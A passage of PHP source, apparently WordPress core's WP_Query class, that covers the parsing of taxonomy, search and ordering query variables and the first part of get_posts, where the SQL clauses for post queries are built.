if ( ! empty( $query_vars['tag__not_in'] ) ) {
$query_vars['tag__not_in'] = array_map( 'absint', array_unique( (array) $query_vars['tag__not_in'] ) );
sort( $query_vars['tag__not_in'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag__not_in'],
'operator' => 'NOT IN',
);
}
if ( ! empty( $query_vars['tag__and'] ) ) {
$query_vars['tag__and'] = array_map( 'absint', array_unique( (array) $query_vars['tag__and'] ) );
sort( $query_vars['tag__and'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag__and'],
'operator' => 'AND',
);
}
if ( ! empty( $query_vars['tag_slug__in'] ) ) {
$query_vars['tag_slug__in'] = array_map( 'sanitize_title_for_query', array_unique( (array) $query_vars['tag_slug__in'] ) );
sort( $query_vars['tag_slug__in'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag_slug__in'],
'field' => 'slug',
);
}
if ( ! empty( $query_vars['tag_slug__and'] ) ) {
$query_vars['tag_slug__and'] = array_map( 'sanitize_title_for_query', array_unique( (array) $query_vars['tag_slug__and'] ) );
sort( $query_vars['tag_slug__and'] );
$tax_query[] = array(
'taxonomy' => 'post_tag',
'terms' => $query_vars['tag_slug__and'],
'field' => 'slug',
'operator' => 'AND',
);
}
$this->tax_query = new WP_Tax_Query( $tax_query );
/**
* Fires after taxonomy-related query vars have been parsed.
*
* @since 3.7.0
*
* @param WP_Query $query The WP_Query instance.
*/
do_action( 'parse_tax_query', $this );
}
/**
* Generates SQL for the WHERE clause based on passed search terms.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query_vars Query variables.
* @return string WHERE clause.
*/
protected function parse_search( &$query_vars ) {
global $wpdb;
$search = '';
// Added slashes screw with quote grouping when done early, so done later.
$query_vars['s'] = stripslashes( $query_vars['s'] );
if ( empty( $_GET['s'] ) && $this->is_main_query() ) {
$query_vars['s'] = urldecode( $query_vars['s'] );
}
// There are no line breaks in <input /> fields.
$query_vars['s'] = str_replace( array( "\r", "\n" ), '', $query_vars['s'] );
$query_vars['search_terms_count'] = 1;
if ( ! empty( $query_vars['sentence'] ) ) {
$query_vars['search_terms'] = array( $query_vars['s'] );
} else {
if ( preg_match_all( '/".*?("|$)|((?<=[\t ",+])|^)[^\t ",+]+/', $query_vars['s'], $matches ) ) {
$query_vars['search_terms_count'] = count( $matches[0] );
$query_vars['search_terms'] = $this->parse_search_terms( $matches[0] );
// If the search string has only short terms or stopwords, or is 10+ terms long, match it as sentence.
if ( empty( $query_vars['search_terms'] ) || count( $query_vars['search_terms'] ) > 9 ) {
$query_vars['search_terms'] = array( $query_vars['s'] );
}
} else {
$query_vars['search_terms'] = array( $query_vars['s'] );
}
}
$n = ! empty( $query_vars['exact'] ) ? '' : '%';
$searchand = '';
$query_vars['search_orderby_title'] = array();
$default_search_columns = array( 'post_title', 'post_excerpt', 'post_content' );
$search_columns = ! empty( $query_vars['search_columns'] ) ? $query_vars['search_columns'] : $default_search_columns;
if ( ! is_array( $search_columns ) ) {
$search_columns = array( $search_columns );
}
/**
* Filters the columns to search in a WP_Query search.
*
* The supported columns are `post_title`, `post_excerpt` and `post_content`.
* They are all included by default.
*
* @since 6.2.0
*
* @param string[] $search_columns Array of column names to be searched.
* @param string $search Text being searched.
* @param WP_Query $query The current WP_Query instance.
*/
$search_columns = (array) apply_filters( 'post_search_columns', $search_columns, $query_vars['s'], $this );
// Use only supported search columns.
$search_columns = array_intersect( $search_columns, $default_search_columns );
if ( empty( $search_columns ) ) {
$search_columns = $default_search_columns;
}
/**
* Filters the prefix that indicates that a search term should be excluded from results.
*
* @since 4.7.0
*
* @param string $exclusion_prefix The prefix. Default '-'. Returning
* an empty value disables exclusions.
*/
$exclusion_prefix = apply_filters( 'wp_query_search_exclusion_prefix', '-' );
foreach ( $query_vars['search_terms'] as $term ) {
// If there is an $exclusion_prefix, terms prefixed with it should be excluded.
$exclude = $exclusion_prefix && str_starts_with( $term, $exclusion_prefix );
if ( $exclude ) {
$like_op = 'NOT LIKE';
$andor_op = 'AND';
$term = substr( $term, 1 );
} else {
$like_op = 'LIKE';
$andor_op = 'OR';
}
if ( $n && ! $exclude ) {
$like = '%' . $wpdb->esc_like( $term ) . '%';
$query_vars['search_orderby_title'][] = $wpdb->prepare( "{$wpdb->posts}.post_title LIKE %s", $like );
}
$like = $n . $wpdb->esc_like( $term ) . $n;
$search_columns_parts = array();
foreach ( $search_columns as $search_column ) {
$search_columns_parts[ $search_column ] = $wpdb->prepare( "({$wpdb->posts}.$search_column $like_op %s)", $like );
}
if ( ! empty( $this->allow_query_attachment_by_filename ) ) {
$search_columns_parts['attachment'] = $wpdb->prepare( "(sq1.meta_value $like_op %s)", $like );
}
$search .= "$searchand(" . implode( " $andor_op ", $search_columns_parts ) . ')';
$searchand = ' AND ';
}
if ( ! empty( $search ) ) {
$search = " AND ({$search}) ";
if ( ! is_user_logged_in() ) {
$search .= " AND ({$wpdb->posts}.post_password = '') ";
}
}
return $search;
}
/**
* Checks if the terms are suitable for searching.
*
* Uses an array of stopwords (terms) that are excluded from the separate
* term matching when searching for posts. The list of English stopwords is
* the approximate search engines list, and is translatable.
*
* @since 3.7.0
*
* @param string[] $terms Array of terms to check.
* @return string[] Terms that are not stopwords.
*/
protected function parse_search_terms( $terms ) {
$strtolower = function_exists( 'mb_strtolower' ) ? 'mb_strtolower' : 'strtolower';
$checked = array();
$stopwords = $this->get_search_stopwords();
foreach ( $terms as $term ) {
// Keep before/after spaces when term is for exact match.
if ( preg_match( '/^".+"$/', $term ) ) {
$term = trim( $term, "\"'" );
} else {
$term = trim( $term, "\"' " );
}
// Avoid single A-Z and single dashes.
if ( ! $term || ( 1 === strlen( $term ) && preg_match( '/^[a-z\-]$/i', $term ) ) ) {
continue;
}
if ( in_array( call_user_func( $strtolower, $term ), $stopwords, true ) ) {
continue;
}
$checked[] = $term;
}
return $checked;
}
/**
* Retrieves stopwords used when parsing search terms.
*
* @since 3.7.0
*
* @return string[] Stopwords.
*/
protected function get_search_stopwords() {
if ( isset( $this->stopwords ) ) {
return $this->stopwords;
}
/*
* translators: This is a comma-separated list of very common words that should be excluded from a search,
* like a, an, and the. These are usually called "stopwords". You should not simply translate these individual
* words into your language. Instead, look for and provide commonly accepted stopwords in your language.
*/
$words = explode(
',',
_x(
'about,an,are,as,at,be,by,com,for,from,how,in,is,it,of,on,or,that,the,this,to,was,what,when,where,who,will,with,www',
'Comma-separated list of search stopwords in your language'
)
);
$stopwords = array();
foreach ( $words as $word ) {
$word = trim( $word, "\r\n\t " );
if ( $word ) {
$stopwords[] = $word;
}
}
/**
* Filters stopwords used when parsing search terms.
*
* @since 3.7.0
*
* @param string[] $stopwords Array of stopwords.
*/
$this->stopwords = apply_filters( 'wp_search_stopwords', $stopwords );
return $this->stopwords;
}
/**
* Generates SQL for the ORDER BY condition based on passed search terms.
*
* @since 3.7.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param array $query_vars Query variables.
* @return string ORDER BY clause.
*/
protected function parse_search_order( &$query_vars ) {
global $wpdb;
if ( $query_vars['search_terms_count'] > 1 ) {
$num_terms = count( $query_vars['search_orderby_title'] );
// If the search terms contain negative queries, don't bother ordering by sentence matches.
$like = '';
if ( ! preg_match( '/(?:\s|^)\-/', $query_vars['s'] ) ) {
$like = '%' . $wpdb->esc_like( $query_vars['s'] ) . '%';
}
$search_orderby = '';
// Sentence match in 'post_title'.
if ( $like ) {
$search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_title LIKE %s THEN 1 ", $like );
}
/*
* Sanity limit, sort as sentence when more than 6 terms
* (few searches are longer than 6 terms and most titles are not).
*/
if ( $num_terms < 7 ) {
// All words in title.
$search_orderby .= 'WHEN ' . implode( ' AND ', $query_vars['search_orderby_title'] ) . ' THEN 2 ';
// Any word in title, not needed when $num_terms == 1.
if ( $num_terms > 1 ) {
$search_orderby .= 'WHEN ' . implode( ' OR ', $query_vars['search_orderby_title'] ) . ' THEN 3 ';
}
}
// Sentence match in 'post_content' and 'post_excerpt'.
if ( $like ) {
$search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_excerpt LIKE %s THEN 4 ", $like );
$search_orderby .= $wpdb->prepare( "WHEN {$wpdb->posts}.post_content LIKE %s THEN 5 ", $like );
}
if ( $search_orderby ) {
$search_orderby = '(CASE ' . $search_orderby . 'ELSE 6 END)';
}
} else {
// Single word or sentence search.
$search_orderby = reset( $query_vars['search_orderby_title'] ) . ' DESC';
}
return $search_orderby;
}
/**
* Converts the given orderby alias (if allowed) to a properly-prefixed value.
*
* @since 4.0.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @param string $orderby Alias for the field to order by.
* @return string|false Table-prefixed value to used in the ORDER clause. False otherwise.
*/
protected function parse_orderby( $orderby ) {
global $wpdb;
// Used to filter values.
$allowed_keys = array(
'post_name',
'post_author',
'post_date',
'post_title',
'post_modified',
'post_parent',
'post_type',
'name',
'author',
'date',
'title',
'modified',
'parent',
'type',
'ID',
'menu_order',
'comment_count',
'rand',
'post__in',
'post_parent__in',
'post_name__in',
);
$primary_meta_key = '';
$primary_meta_query = false;
$meta_clauses = $this->meta_query->get_clauses();
if ( ! empty( $meta_clauses ) ) {
$primary_meta_query = reset( $meta_clauses );
if ( ! empty( $primary_meta_query['key'] ) ) {
$primary_meta_key = $primary_meta_query['key'];
$allowed_keys[] = $primary_meta_key;
}
$allowed_keys[] = 'meta_value';
$allowed_keys[] = 'meta_value_num';
$allowed_keys = array_merge( $allowed_keys, array_keys( $meta_clauses ) );
}
// If RAND() contains a seed value, sanitize and add to allowed keys.
$rand_with_seed = false;
if ( preg_match( '/RAND\(([0-9]+)\)/i', $orderby, $matches ) ) {
$orderby = sprintf( 'RAND(%s)', (int) $matches[1] );
$allowed_keys[] = $orderby;
$rand_with_seed = true;
}
if ( ! in_array( $orderby, $allowed_keys, true ) ) {
return false;
}
$orderby_clause = '';
switch ( $orderby ) {
case 'post_name':
case 'post_author':
case 'post_date':
case 'post_title':
case 'post_modified':
case 'post_parent':
case 'post_type':
case 'ID':
case 'menu_order':
case 'comment_count':
$orderby_clause = "{$wpdb->posts}.{$orderby}";
break;
case 'rand':
$orderby_clause = 'RAND()';
break;
case $primary_meta_key:
case 'meta_value':
if ( ! empty( $primary_meta_query['type'] ) ) {
$orderby_clause = "CAST({$primary_meta_query['alias']}.meta_value AS {$primary_meta_query['cast']})";
} else {
$orderby_clause = "{$primary_meta_query['alias']}.meta_value";
}
break;
case 'meta_value_num':
$orderby_clause = "{$primary_meta_query['alias']}.meta_value+0";
break;
case 'post__in':
if ( ! empty( $this->query_vars['post__in'] ) ) {
$orderby_clause = "FIELD({$wpdb->posts}.ID," . implode( ',', array_map( 'absint', $this->query_vars['post__in'] ) ) . ')';
}
break;
case 'post_parent__in':
if ( ! empty( $this->query_vars['post_parent__in'] ) ) {
$orderby_clause = "FIELD( {$wpdb->posts}.post_parent," . implode( ', ', array_map( 'absint', $this->query_vars['post_parent__in'] ) ) . ' )';
}
break;
case 'post_name__in':
if ( ! empty( $this->query_vars['post_name__in'] ) ) {
$post_name__in = array_map( 'sanitize_title_for_query', $this->query_vars['post_name__in'] );
$post_name__in_string = "'" . implode( "','", $post_name__in ) . "'";
$orderby_clause = "FIELD( {$wpdb->posts}.post_name," . $post_name__in_string . ' )';
}
break;
default:
if ( array_key_exists( $orderby, $meta_clauses ) ) {
// $orderby corresponds to a meta_query clause.
$meta_clause = $meta_clauses[ $orderby ];
$orderby_clause = "CAST({$meta_clause['alias']}.meta_value AS {$meta_clause['cast']})";
} elseif ( $rand_with_seed ) {
$orderby_clause = $orderby;
} else {
// Default: order by post field.
$orderby_clause = "{$wpdb->posts}.post_" . sanitize_key( $orderby );
}
break;
}
return $orderby_clause;
}
/**
* Parse an 'order' query variable and cast it to ASC or DESC as necessary.
*
* @since 4.0.0
*
* @param string $order The 'order' query variable.
* @return string The sanitized 'order' query variable.
*/
protected function parse_order( $order ) {
if ( ! is_string( $order ) || empty( $order ) ) {
return 'DESC';
}
if ( 'ASC' === strtoupper( $order ) ) {
return 'ASC';
} else {
return 'DESC';
}
}
/**
* Sets the 404 property and saves whether query is feed.
*
* @since 2.0.0
*/
public function set_404() {
$is_feed = $this->is_feed;
$this->init_query_flags();
$this->is_404 = true;
$this->is_feed = $is_feed;
/**
* Fires after a 404 is triggered.
*
* @since 5.5.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'set_404', array( $this ) );
}
/**
* Retrieves the value of a query variable.
*
* @since 1.5.0
* @since 3.9.0 The `$default_value` argument was introduced.
*
* @param string $query_var Query variable key.
* @param mixed $default_value Optional. Value to return if the query variable is not set.
* Default empty string.
* @return mixed Contents of the query variable.
*/
public function get( $query_var, $default_value = '' ) {
if ( isset( $this->query_vars[ $query_var ] ) ) {
return $this->query_vars[ $query_var ];
}
return $default_value;
}
/**
* Sets the value of a query variable.
*
* @since 1.5.0
*
* @param string $query_var Query variable key.
* @param mixed $value Query variable value.
*/
public function set( $query_var, $value ) {
$this->query_vars[ $query_var ] = $value;
}
/**
* Retrieves an array of posts based on query variables.
*
* There are a few filters and actions that can be used to modify the post
* database query.
*
* @since 1.5.0
*
* @global wpdb $wpdb WordPress database abstraction object.
*
* @return WP_Post[]|int[] Array of post objects or post IDs.
*/
public function get_posts() {
global $wpdb;
$this->parse_query();
/**
* Fires after the query variable object is created, but before the actual query is run.
*
* Note: If using conditional tags, use the method versions within the passed instance
* (e.g. $this->is_main_query() instead of is_main_query()). This is because the functions
* like is_main_query() test against the global $wp_query instance, not the passed one.
*
* @since 2.0.0
*
* @param WP_Query $query The WP_Query instance (passed by reference).
*/
do_action_ref_array( 'pre_get_posts', array( &$this ) );
// Locally scoped reference for easy of use.
$query_vars = &$this->query_vars;
// Fill again in case 'pre_get_posts' unset some vars.
$query_vars = $this->fill_query_vars( $query_vars );
/**
* Filters whether an attachment query should include filenames or not.
*
* @since 6.0.3
*
* @param bool $allow_query_attachment_by_filename Whether or not to include filenames.
*/
$this->allow_query_attachment_by_filename = apply_filters( 'wp_allow_query_attachment_by_filename', false );
remove_all_filters( 'wp_allow_query_attachment_by_filename' );
// Parse meta query.
$this->meta_query = new WP_Meta_Query();
$this->meta_query->parse_query_vars( $query_vars );
// Set a flag if a 'pre_get_posts' hook changed the query vars.
$hash = md5( serialize( $this->query_vars ) );
if ( $hash !== $this->query_vars_hash ) {
$this->query_vars_changed = true;
$this->query_vars_hash = $hash;
}
unset( $hash );
// First let's clear some variables.
$distinct = '';
$whichauthor = '';
$whichmimetype = '';
$where = '';
$limits = '';
$join = '';
$search = '';
$groupby = '';
$post_status_join = false;
$page = 1;
if ( isset( $query_vars['caller_get_posts'] ) ) {
_deprecated_argument(
'WP_Query',
'3.1.0',
sprintf(
/* translators: 1: caller_get_posts, 2: ignore_sticky_posts */
__( '%1$s is deprecated. Use %2$s instead.' ),
'<code>caller_get_posts</code>',
'<code>ignore_sticky_posts</code>'
)
);
if ( ! isset( $query_vars['ignore_sticky_posts'] ) ) {
$query_vars['ignore_sticky_posts'] = $query_vars['caller_get_posts'];
}
}
if ( ! isset( $query_vars['ignore_sticky_posts'] ) ) {
$query_vars['ignore_sticky_posts'] = false;
}
if ( ! isset( $query_vars['suppress_filters'] ) ) {
$query_vars['suppress_filters'] = false;
}
if ( ! isset( $query_vars['cache_results'] ) ) {
$query_vars['cache_results'] = true;
}
if ( ! isset( $query_vars['update_post_term_cache'] ) ) {
$query_vars['update_post_term_cache'] = true;
}
if ( ! isset( $query_vars['update_menu_item_cache'] ) ) {
$query_vars['update_menu_item_cache'] = false;
}
if ( ! isset( $query_vars['lazy_load_term_meta'] ) ) {
$query_vars['lazy_load_term_meta'] = $query_vars['update_post_term_cache'];
} elseif ( $query_vars['lazy_load_term_meta'] ) { // Lazy loading term meta only works if term caches are primed.
$query_vars['update_post_term_cache'] = true;
}
if ( ! isset( $query_vars['update_post_meta_cache'] ) ) {
$query_vars['update_post_meta_cache'] = true;
}
if ( ! isset( $query_vars['post_type'] ) ) {
if ( $this->is_search ) {
$query_vars['post_type'] = 'any';
} else {
$query_vars['post_type'] = '';
}
}
$post_type = $query_vars['post_type'];
if ( empty( $query_vars['posts_per_page'] ) ) {
$query_vars['posts_per_page'] = get_option( 'posts_per_page' );
}
if ( isset( $query_vars['showposts'] ) && $query_vars['showposts'] ) {
$query_vars['showposts'] = (int) $query_vars['showposts'];
$query_vars['posts_per_page'] = $query_vars['showposts'];
}
if ( ( isset( $query_vars['posts_per_archive_page'] ) && 0 != $query_vars['posts_per_archive_page'] ) && ( $this->is_archive || $this->is_search ) ) {
$query_vars['posts_per_page'] = $query_vars['posts_per_archive_page'];
}
if ( ! isset( $query_vars['nopaging'] ) ) {
if ( -1 == $query_vars['posts_per_page'] ) {
$query_vars['nopaging'] = true;
} else {
$query_vars['nopaging'] = false;
}
}
if ( $this->is_feed ) {
// This overrides 'posts_per_page'.
if ( ! empty( $query_vars['posts_per_rss'] ) ) {
$query_vars['posts_per_page'] = $query_vars['posts_per_rss'];
} else {
$query_vars['posts_per_page'] = get_option( 'posts_per_rss' );
}
$query_vars['nopaging'] = false;
}
$query_vars['posts_per_page'] = (int) $query_vars['posts_per_page'];
if ( $query_vars['posts_per_page'] < -1 ) {
$query_vars['posts_per_page'] = abs( $query_vars['posts_per_page'] );
} elseif ( 0 === $query_vars['posts_per_page'] ) {
$query_vars['posts_per_page'] = 1;
}
if ( ! isset( $query_vars['comments_per_page'] ) || 0 == $query_vars['comments_per_page'] ) {
$query_vars['comments_per_page'] = get_option( 'comments_per_page' );
}
if ( $this->is_home && ( empty( $this->query ) || 'true' === $query_vars['preview'] ) && ( 'page' === get_option( 'show_on_front' ) ) && get_option( 'page_on_front' ) ) {
$this->is_page = true;
$this->is_home = false;
$query_vars['page_id'] = get_option( 'page_on_front' );
}
if ( isset( $query_vars['page'] ) ) {
$query_vars['page'] = is_scalar( $query_vars['page'] ) ? absint( trim( $query_vars['page'], '/' ) ) : 0;
}
// If true, forcibly turns off SQL_CALC_FOUND_ROWS even when limits are present.
if ( isset( $query_vars['no_found_rows'] ) ) {
$query_vars['no_found_rows'] = (bool) $query_vars['no_found_rows'];
} else {
$query_vars['no_found_rows'] = false;
}
switch ( $query_vars['fields'] ) {
case 'ids':
$fields = "{$wpdb->posts}.ID";
break;
case 'id=>parent':
$fields = "{$wpdb->posts}.ID, {$wpdb->posts}.post_parent";
break;
case '':
/*
* Set the default to 'all'.
*
* This is used in `WP_Query::the_post` to determine if the
* entire post object has been queried.
*/
$query_vars['fields'] = 'all';
// Falls through.
default:
$fields = "{$wpdb->posts}.*";
}
if ( '' !== $query_vars['menu_order'] ) {
$where .= " AND {$wpdb->posts}.menu_order = " . $query_vars['menu_order'];
}
// The "m" parameter is meant for months but accepts datetimes of varying specificity.
if ( $query_vars['m'] ) {
$where .= " AND YEAR({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 0, 4 );
if ( strlen( $query_vars['m'] ) > 5 ) {
$where .= " AND MONTH({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 4, 2 );
}
if ( strlen( $query_vars['m'] ) > 7 ) {
$where .= " AND DAYOFMONTH({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 6, 2 );
}
if ( strlen( $query_vars['m'] ) > 9 ) {
$where .= " AND HOUR({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 8, 2 );
}
if ( strlen( $query_vars['m'] ) > 11 ) {
$where .= " AND MINUTE({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 10, 2 );
}
if ( strlen( $query_vars['m'] ) > 13 ) {
$where .= " AND SECOND({$wpdb->posts}.post_date)=" . substr( $query_vars['m'], 12, 2 );
}
}
// Handle the other individual date parameters.
$date_parameters = array();
if ( '' !== $query_vars['hour'] ) {
$date_parameters['hour'] = $query_vars['hour'];
}
if ( '' !== $query_vars['minute'] ) {
$date_parameters['minute'] = $query_vars['minute'];
}
if ( '' !== $query_vars['second'] ) {
$date_parameters['second'] = $query_vars['second'];
}
if ( $query_vars['year'] ) {
$date_parameters['year'] = $query_vars['year'];
}
if ( $query_vars['monthnum'] ) {
$date_parameters['monthnum'] = $query_vars['monthnum'];
}
if ( $query_vars['w'] ) {
$date_parameters['week'] = $query_vars['w'];
}
if ( $query_vars['day'] ) {
$date_parameters['day'] = $query_vars['day'];
}
if ( $date_parameters ) {
$date_query = new WP_Date_Query( array( $date_parameters ) );
$where .= $date_query->get_sql();
}
unset( $date_parameters, $date_query );
// Handle complex date queries.
if ( ! empty( $query_vars['date_query'] ) ) {
$this->date_query = new WP_Date_Query( $query_vars['date_query'] );
$where .= $this->date_query->get_sql();
}
// If we've got a post_type AND it's not "any" post_type.
if ( ! empty( $query_vars['post_type'] ) && 'any' !== $query_vars['post_type'] ) {
foreach ( (array) $query_vars['post_type'] as $_post_type ) {
$ptype_obj = get_post_type_object( $_post_type );
if ( ! $ptype_obj || ! $ptype_obj->query_var || empty( $query_vars[ $ptype_obj->query_var ] ) ) {
continue;
}
if ( ! $ptype_obj->hierarchical ) {
// Non-hierarchical post types can directly use 'name'.
$query_vars['name'] = $query_vars[ $ptype_obj->query_var ];
} else {
// Hierarchical post types will operate through 'pagename'.
$query_vars['pagename'] = $query_vars[ $ptype_obj->query_var ];
$query_vars['name'] = '';
}
// Only one request for a slug is possible, this is why name & pagename are overwritten above.
break;
} // End foreach.
unset( $ptype_obj );
}
if ( '' !== $query_vars['title'] ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.post_title = %s", stripslashes( $query_vars['title'] ) );
}
// Parameters related to 'post_name'.
if ( '' !== $query_vars['name'] ) {
$query_vars['name'] = sanitize_title_for_query( $query_vars['name'] );
$where .= " AND {$wpdb->posts}.post_name = '" . $query_vars['name'] . "'";
} elseif ( '' !== $query_vars['pagename'] ) {
if ( isset( $this->queried_object_id ) ) {
$reqpage = $this->queried_object_id;
} else {
if ( 'page' !== $query_vars['post_type'] ) {
foreach ( (array) $query_vars['post_type'] as $_post_type ) {
$ptype_obj = get_post_type_object( $_post_type );
if ( ! $ptype_obj || ! $ptype_obj->hierarchical ) {
continue;
}
$reqpage = get_page_by_path( $query_vars['pagename'], OBJECT, $_post_type );
if ( $reqpage ) {
break;
}
}
unset( $ptype_obj );
} else {
$reqpage = get_page_by_path( $query_vars['pagename'] );
}
if ( ! empty( $reqpage ) ) {
$reqpage = $reqpage->ID;
} else {
$reqpage = 0;
}
}
$page_for_posts = get_option( 'page_for_posts' );
if ( ( 'page' !== get_option( 'show_on_front' ) ) || empty( $page_for_posts ) || ( $reqpage != $page_for_posts ) ) {
$query_vars['pagename'] = sanitize_title_for_query( wp_basename( $query_vars['pagename'] ) );
$query_vars['name'] = $query_vars['pagename'];
$where .= " AND ({$wpdb->posts}.ID = '$reqpage')";
$reqpage_obj = get_post( $reqpage );
if ( is_object( $reqpage_obj ) && 'attachment' === $reqpage_obj->post_type ) {
$this->is_attachment = true;
$post_type = 'attachment';
$query_vars['post_type'] = 'attachment';
$this->is_page = true;
$query_vars['attachment_id'] = $reqpage;
}
}
} elseif ( '' !== $query_vars['attachment'] ) {
$query_vars['attachment'] = sanitize_title_for_query( wp_basename( $query_vars['attachment'] ) );
$query_vars['name'] = $query_vars['attachment'];
$where .= " AND {$wpdb->posts}.post_name = '" . $query_vars['attachment'] . "'";
} elseif ( is_array( $query_vars['post_name__in'] ) && ! empty( $query_vars['post_name__in'] ) ) {
$query_vars['post_name__in'] = array_map( 'sanitize_title_for_query', $query_vars['post_name__in'] );
// Duplicate array before sorting to allow for the orderby clause.
$post_name__in_for_where = array_unique( $query_vars['post_name__in'] );
sort( $post_name__in_for_where );
$post_name__in = "'" . implode( "','", $post_name__in_for_where ) . "'";
$where .= " AND {$wpdb->posts}.post_name IN ($post_name__in)";
}
// If an attachment is requested by number, let it supersede any post number.
if ( $query_vars['attachment_id'] ) {
$query_vars['p'] = absint( $query_vars['attachment_id'] );
}
// If a post number is specified, load that post.
if ( $query_vars['p'] ) {
$where .= " AND {$wpdb->posts}.ID = " . $query_vars['p'];
} elseif ( $query_vars['post__in'] ) {
// Duplicate array before sorting to allow for the orderby clause.
$post__in_for_where = $query_vars['post__in'];
$post__in_for_where = array_unique( array_map( 'absint', $post__in_for_where ) );
sort( $post__in_for_where );
$post__in = implode( ',', array_map( 'absint', $post__in_for_where ) );
$where .= " AND {$wpdb->posts}.ID IN ($post__in)";
} elseif ( $query_vars['post__not_in'] ) {
sort( $query_vars['post__not_in'] );
$post__not_in = implode( ',', array_map( 'absint', $query_vars['post__not_in'] ) );
$where .= " AND {$wpdb->posts}.ID NOT IN ($post__not_in)";
}
if ( is_numeric( $query_vars['post_parent'] ) ) {
$where .= $wpdb->prepare( " AND {$wpdb->posts}.post_parent = %d ", $query_vars['post_parent'] );
} elseif ( $query_vars['post_parent__in'] ) {
// Duplicate array before sorting to allow for the orderby clause.
$post_parent__in_for_where = $query_vars['post_parent__in'];
$post_parent__in_for_where = array_unique( array_map( 'absint', $post_parent__in_for_where ) );
sort( $post_parent__in_for_where );
$post_parent__in = implode( ',', array_map( 'absint', $post_parent__in_for_where ) );
$where .= " AND {$wpdb->posts}.post_parent IN ($post_parent__in)";
} elseif ( $query_vars['post_parent__not_in'] ) {
sort( $query_vars['post_parent__not_in'] );
$post_parent__not_in = implode( ',', array_map( 'absint', $query_vars['post_parent__not_in'] ) );
$where .= " AND {$wpdb->posts}.post_parent NOT IN ($post_parent__not_in)";
}
if ( $query_vars['page_id'] ) {
if ( ( 'page' !== get_option( 'show_on_front' ) ) || ( get_option( 'page_for_posts' ) != $query_vars['page_id'] ) ) {
$query_vars['p'] = $query_vars['page_id'];
$where = " AND {$wpdb->posts}.ID = " . $query_vars['page_id'];
}
}
// If a search pattern is specified, load the posts that match.
if ( strlen( $query_vars['s'] ) ) {
$search = $this->parse_search( $query_vars );
}
if ( ! $query_vars['suppress_filters'] ) {
/**
* Filters the search SQL that is used in the WHERE clause of WP_Query.
*
* @since 3.0.0
*
* @param string $search Search SQL for WHERE clause.
* @param WP_Query $query The current WP_Query object.
*/
$search = apply_filters_ref_array( 'posts_search', array( $search, &$this ) );
}
// Taxonomies.
if ( ! $this->is_singular ) {
$this->parse_tax_query( $query_vars );
$clauses = $this->tax_query->get_sql( $wpdb->posts, 'ID' );
$join .= $clauses['join'];
$where .= $clauses['where'];
}
if ( $this->is_tax ) {
if ( empty( $post_type ) ) {
// Do a fully inclusive search for currently registered post types of queried taxonomies.
$post_type = array();
$taxonomies = array_keys( $this->tax_query->queried_terms );
foreach ( get_post_types( array( 'exclude_from_search' => false ) ) as $pt ) {
$object_taxonomies = 'attachment' === $pt ? get_taxonomies_for_attachments() : get_object_taxonomies( $pt );
if ( array_intersect( $taxonomies, $object_taxonomies ) ) {
$post_type[] = $pt;
}
}
if ( ! $post_type ) {
$post_type = 'any';
} elseif ( count( $post_type ) === 1 ) {
$post_type = $post_type[0];
} else {
// Sort post types to ensure same cache key generation.
sort( $post_type );
}
$post_status_join = true;
} elseif ( in_array( 'attachment', (array) $post_type, true ) ) {
$post_status_join = true;
}
}
/*
* Ensure that 'taxonomy', 'term', 'term_id', 'cat', and
* 'category_name' vars are set for backward compatibility.
*/
if ( ! empty( $this->tax_query->queried_terms ) ) {
/*
* Set 'taxonomy', 'term', and 'term_id' to the
* first taxonomy other than 'post_tag' or 'category'.
*/
if ( ! isset( $query_vars['taxonomy'] ) ) {
foreach ( $this->tax_query->queried_terms as $queried_taxonomy => $queried_items ) {
if ( empty( $queried_items['terms'][0] ) ) {
continue;
}
if ( ! in_array( $queried_taxonomy, array( 'category', 'post_tag' ), true ) ) {
$query_vars['taxonomy'] = $queried_taxonomy;
if ( 'slug' === $queried_items['field'] ) {
$query_vars['term'] = $queried_items['terms'][0];
} else {
$query_vars['term_id'] = $queried_items['terms'][0];
}
// Take the first one we find.
break;
}
}
}
// 'cat', 'category_name', 'tag_id'.
foreach ( $this->tax_query->queried_terms as $queried_taxonomy => $queried_items ) {
if ( empty( $queried_items['terms'][0] ) ) {
continue;
}
if ( 'category' === $queried_taxonomy ) {
$the_cat = get_term_by( $queried_items['field'], $queried_items['terms'][0], 'category' );
if ( $the_cat ) {
$this->set( 'cat', $the_cat->term_id );
$this->set( 'category_name', $the_cat->slug );
}
unset( $the_cat );
}
if ( 'post_tag' === $queried_taxonomy ) {
$the_tag = get_term_by( $queried_items['field'], $queried_items['terms'][0], 'post_tag' );
if ( $the_tag ) {
$this->set( 'tag_id', $the_tag->term_id );
}
unset( $the_tag );
}
}
}
if ( ! empty( $this->tax_query->queries ) || ! empty( $this->meta_query->queries ) || ! empty( $this->allow_query_attachment_by_filename ) ) {
$groupby = "{$wpdb->posts}.ID";
}
// Author/user stuff.
if ( ! empty( $query_vars['author'] ) && '0' != $query_vars['author'] ) {
$query_vars['author'] = addslashes_gpc( '' . urldecode( $query_vars['author'] ) );
$authors = array_unique( array_map( 'intval', preg_split( '/[,\s]+/', $query_vars['author'] ) ) );
sort( $authors );
foreach ( $authors as $author ) {
$key = $author > 0 ? 'author__in' : 'author__not_in';
$query_vars[ $key ][] = abs( $author );
}
$query_vars['author'] = implode( ',', $authors );
}
if ( ! empty( $query_vars['author__not_in'] ) ) {
if ( is_array( $query_vars['author__not_in'] ) ) {
$query_vars['author__not_in'] = array_unique( array_map( 'absint', $query_vars['author__not_in'] ) );
sort( $query_vars['author__not_in'] );
}
$author__not_in = implode( ',', (array) $query_vars['author__not_in'] );
